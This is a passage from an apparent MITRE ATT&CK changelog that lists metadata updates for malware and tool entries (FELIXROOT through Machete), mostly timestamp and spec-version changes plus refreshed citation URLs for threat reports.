modified | 2023-03-26 18:59:38.457000+00:00 | 2025-04-16 20:37:52.840000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0361] Expand
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-20 18:43:16.989000+00:00 | 2025-04-16 20:38:56.328000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0569] Explosive
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-27 01:56:35.649000+00:00 | 2025-04-16 20:38:15.035000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0181] FALLCHILL
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-23 20:01:10.366000+00:00 | 2025-04-16 20:38:45.711000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0267] FELIXROOT
Current version: 2.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-11 02:33:38.488000+00:00 | 2024-11-17 16:15:55.203000+00:00 |
external_references[4]['description'] | Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018. | Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved November 17, 2024. |
external_references[4]['url'] | https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html | https://web.archive.org/web/20200607025424/https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html |
[S0036] FLASHFLOOD
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 02:54:51.882000+00:00 | 2024-11-17 15:05:25.105000+00:00 |
external_references[1]['description'] | FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015. | FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf | https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/05/20081935/rpt-apt30.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0173] FLIPSIDE
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 16:24:24.753000+00:00 | 2025-04-16 20:37:55.971000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0628] FYAnti
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-11 15:57:36.797000+00:00 | 2025-04-16 20:38:04.305000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0076] FakeM
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-27 20:41:21.473000+00:00 | 2025-04-16 20:38:32.986000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0512] FatDuke
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-16 01:45:28.826000+00:00 | 2025-04-16 20:38:08.387000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0171] Felismus
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 18:52:30.568000+00:00 | 2025-04-16 20:37:57.048000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0679] Ferocious
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-02-01 21:21:35.768000+00:00 | 2025-04-16 20:38:17.322000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0120] Fgdump
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 16:40:33.738000+00:00 | 2025-04-16 20:38:51.728000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0355] Final1stspy
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 16:41:11.166000+00:00 | 2025-04-16 20:38:28.188000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0143] Flame
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-12 17:51:18.408000+00:00 | 2025-04-16 20:38:46.014000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0381] FlawedAmmyy
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-07-18 15:59:26.387000+00:00 | 2025-04-16 20:38:04.147000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0193] Forfiles
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:38:54.018000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0503] FrameworkPOS
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-10-19 19:44:15.357000+00:00 | 2025-04-16 20:37:57.360000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0277] FruitFly
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-22 03:55:46.184000+00:00 | 2025-04-16 20:38:05.463000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0417] GRIFFON
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-06-23 19:20:45.892000+00:00 | 2025-04-16 20:37:52.695000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0049] GeminiDuke
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 16:43:20.186000+00:00 | 2025-04-16 20:37:57.198000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0460] Get2
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-06-16 16:48:16.541000+00:00 | 2025-04-16 20:37:54.423000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0597] GoldFinder
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-27 19:50:35.143000+00:00 | 2025-04-16 20:38:31.830000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0477] Goopy
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-07-11 20:35:28.082000+00:00 | 2025-04-16 20:38:41.645000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0690] Green Lambert
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-20 18:12:24.193000+00:00 | 2025-04-16 20:38:10.718000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0561] GuLoader
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-15 19:14:33.244000+00:00 | 2025-04-16 20:38:04.665000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0132] H1N1
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 16:45:07.782000+00:00 | 2025-04-16 20:38:44.456000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0151] HALFBAKED
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:37:55.633000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0037] HAMMERTOSS
Current version: 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-02-09 13:58:23.806000+00:00 | 2024-11-17 14:55:19.537000+00:00 |
external_references[1]['description'] | FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015. | FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf | https://services.google.com/fh/files/misc/rpt-apt29-hammertoss-stealthy-tactics-define-en.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0214] HAPPYWORK
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-04 20:44:43.949000+00:00 | 2024-11-17 15:01:33.385000+00:00 |
external_references[1]['description'] | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018. | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf | https://services.google.com/fh/files/misc/apt37-reaper-the-overlooked-north-korean-actor.pdf |
[S0246] HARDRAIN
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 19:45:04.248000+00:00 | 2025-04-16 20:38:33.134000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0061] HDoor
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-04 20:20:59.961000+00:00 | 2025-04-16 20:37:51.573000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0617] HELLOKITTY
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-18 18:33:58.599000+00:00 | 2025-04-16 20:38:11.555000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0135] HIDEDRV
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 16:47:08.223000+00:00 | 2024-11-17 18:07:17.216000+00:00 |
external_references[2]['description'] | Rascagnères, P.. (2016, October 27). Rootkit analysis: Use case on HideDRV. Retrieved March 9, 2017. | Rascagnères, P.. (2016, October 27). Rootkit analysis: Use case on HideDRV. Retrieved November 17, 2024. |
external_references[2]['url'] | http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf | https://web.archive.org/web/20180202163754/http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0040] HTRAN
Current version: 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-23 20:04:19.262000+00:00 | 2024-11-17 16:27:34.671000+00:00 |
external_references[2]['description'] | Haq, T., Moran, N., Vashisht, S., Scott, M. (2014, September). OPERATION QUANTUM ENTANGLEMENT. Retrieved November 4, 2015. | Haq, T., Moran, N., Vashisht, S., Scott, M. (2014, September). OPERATION QUANTUM ENTANGLEMENT. Retrieved November 17, 2024. |
external_references[2]['url'] | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf | https://web.archive.org/web/20210920193513/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0070] HTTPBrowser
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-20 02:22:13.185000+00:00 | 2025-04-16 20:38:39.195000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0047] Hacking Team UEFI Rootkit
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 16:48:12.607000+00:00 | 2025-04-16 20:38:05.792000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0499] Hancitor
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-10-16 00:41:06.476000+00:00 | 2025-04-16 20:38:42.270000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0224] Havij
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:38:57.107000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0009] Hikit
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 22:03:44.668000+00:00 | 2024-11-17 15:43:38.148000+00:00 |
external_references[1]['description'] | Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016. | Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved November 17, 2024. |
external_references[1]['url'] | https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html | https://web.archive.org/web/20190216180458/https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0203] Hydraq
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-20 22:03:44.662000+00:00 | 2024-11-17 19:55:07.589000+00:00 |
external_references[14]['description'] | Moran, N. (2013, May 20). Ready for Summer: The Sunshop Campaign. Retrieved March 19, 2018. | Moran, N. (2013, May 20). Ready for Summer: The Sunshop Campaign. Retrieved November 17, 2024. |
external_references[14]['url'] | https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html | https://web.archive.org/web/20200302085651/https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html |
external_references[15]['description'] | Moran, N. et al.. (2013, November 10). Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method. Retrieved March 19, 2018. | Moran, N. et al.. (2013, November 10). Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method. Retrieved November 17, 2024. |
external_references[15]['url'] | https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html | https://web.archive.org/web/20190221032148/http://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html |
external_references[17]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved November 17, 2024. |
external_references[17]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0537] HyperStack
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-12-04 15:04:01.604000+00:00 | 2025-04-16 20:38:00.476000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0189] ISMInjector
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-31 12:38:41.115000+00:00 | 2025-04-16 20:38:11.226000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1022] IceApple
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-22 04:45:42.926000+00:00 | 2025-04-16 20:38:38.400000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S1072] Industroyer2
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-06 22:00:22.774000+00:00 | 2025-04-16 20:38:14.728000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0259] InnaputRAT
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-20 02:21:24.856000+00:00 | 2025-04-16 20:38:34.903000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0260] InvisiMole
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-11-29 12:41:28.009000+00:00 | 2025-04-16 20:38:05.140000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0231] Invoke-PSImage
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-18 22:02:48.228000+00:00 | 2025-04-16 20:38:55.222000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0015] Ixeshe
Current version: 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-20 22:45:06.494000+00:00 | 2024-11-17 16:12:58.245000+00:00 |
external_references[1]['description'] | Moran, N., & Villeneuve, N. (2013, August 12). Survival of the Fittest: New York Times Attackers Evolve Quickly [Blog]. Retrieved November 12, 2014. | Moran, N., & Villeneuve, N. (2013, August 12). Survival of the Fittest: New York Times Attackers Evolve Quickly [Blog]. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html | https://web.archive.org/web/20191224162418/https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0389] JCry
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 16:51:27.312000+00:00 | 2025-04-16 20:38:29.735000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0044] JHUHUGIT
Current version: 2.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-11 01:49:50.568000+00:00 | 2024-11-17 14:43:38.591000+00:00 |
external_references[8]['description'] | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017. | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved November 17, 2024. |
external_references[8]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf | https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf |
[S0201] JPIN
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-08-11 19:44:31.363000+00:00 | 2025-04-16 20:38:38.557000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0648] JSS Loader
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-15 19:57:14.998000+00:00 | 2025-04-16 20:38:43.545000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0528] Javali
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-12-22 21:07:41.508000+00:00 | 2025-04-16 20:38:13.353000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0215] KARAE
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 16:52:22.775000+00:00 | 2024-11-17 15:01:33.386000+00:00 |
external_references[2]['description'] | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018. | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved November 17, 2024. |
external_references[2]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf | https://services.google.com/fh/files/misc/apt37-reaper-the-overlooked-north-korean-actor.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0271] KEYMARBLE
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 16:53:14.872000+00:00 | 2025-04-16 20:37:56.418000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0669] KOCTOPUS
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-22 04:47:58.740000+00:00 | 2024-11-17 14:12:07.295000+00:00 |
external_references[2]['description'] | Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021. | Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 17, 2024. |
external_references[2]['url'] | https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf | https://web.archive.org/web/20211003035156/https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0156] KOMPROGO
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 16:53:45.307000+00:00 | 2025-04-16 20:38:19.228000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1075] KOPILUWAK
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-07-25 20:02:07.578000+00:00 | 2025-04-16 20:37:54.797000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0088] Kasidet
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 16:54:23.238000+00:00 | 2025-04-16 20:37:58.992000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0265] Kazuar
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-12-02 21:20:50.906000+00:00 | 2025-04-16 20:38:07.739000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0585] Kerrdown
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-15 21:53:54.011000+00:00 | 2025-04-16 20:38:21.498000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0599] Kinsing
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-08-26 16:39:07.873000+00:00 | 2025-04-16 20:38:37.411000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0437] Kivars
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-06-03 20:19:34.935000+00:00 | 2025-04-16 20:38:31.015000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0250] Koadic
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-27 18:36:30.831000+00:00 | 2024-11-17 14:12:07.296000+00:00 |
external_references[2]['description'] | Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021. | Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 17, 2024. |
external_references[2]['url'] | https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf | https://web.archive.org/web/20211003035156/https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf |
[S0641] Kobalos
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-25 17:16:21.187000+00:00 | 2025-04-16 20:38:25.723000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0162] Komplex
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 16:55:54.637000+00:00 | 2025-04-16 20:38:42.776000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0042] LOWBALL
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 16:56:27.375000+00:00 | 2025-04-16 20:37:59.992000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0211] Linfo
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-01-06 19:32:28.394000+00:00 | 2024-11-17 19:55:07.593000+00:00 |
external_references[2]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved November 17, 2024. |
external_references[2]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0362] Linux Rabbit
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-12-22 15:46:17.965000+00:00 | 2025-04-16 20:37:56.120000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0513] LiteDuke
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-04 15:34:14.458000+00:00 | 2025-04-16 20:38:24.381000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0680] LitePower
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-16 20:36:35.449000+00:00 | 2025-04-16 20:38:22.811000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0681] Lizar
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-15 11:40:31.460000+00:00 | 2025-04-16 20:38:44.147000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0397] LoJax
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 16:57:58.594000+00:00 | 2025-04-16 20:38:32.158000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0447] Lokibot
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-11 17:43:38.029000+00:00 | 2025-04-16 20:38:35.363000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0582] LookBack
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-26 13:29:32.449000+00:00 | 2025-04-16 20:38:35.052000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0121] Lslsass
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 16:59:48.036000+00:00 | 2025-04-16 20:38:50.784000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0532] Lucifer
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-01 20:33:55.926000+00:00 | 2025-04-16 20:38:08.548000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0010] Lurid
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-31 12:39:16.608000+00:00 | 2025-04-16 20:37:58.843000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0500] MCMD
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-07-29 19:48:28.725000+00:00 | 2025-04-16 20:38:54.178000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0443] MESSAGETAP
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-06-24 01:43:11.282000+00:00 | 2025-04-16 20:38:26.051000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0233] MURKYTOP
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 17:00:19.828000+00:00 | 2025-04-16 20:37:52.514000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0282] MacSpy
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 17:00:58.813000+00:00 | 2025-04-16 20:38:44.003000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0409] Machete
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
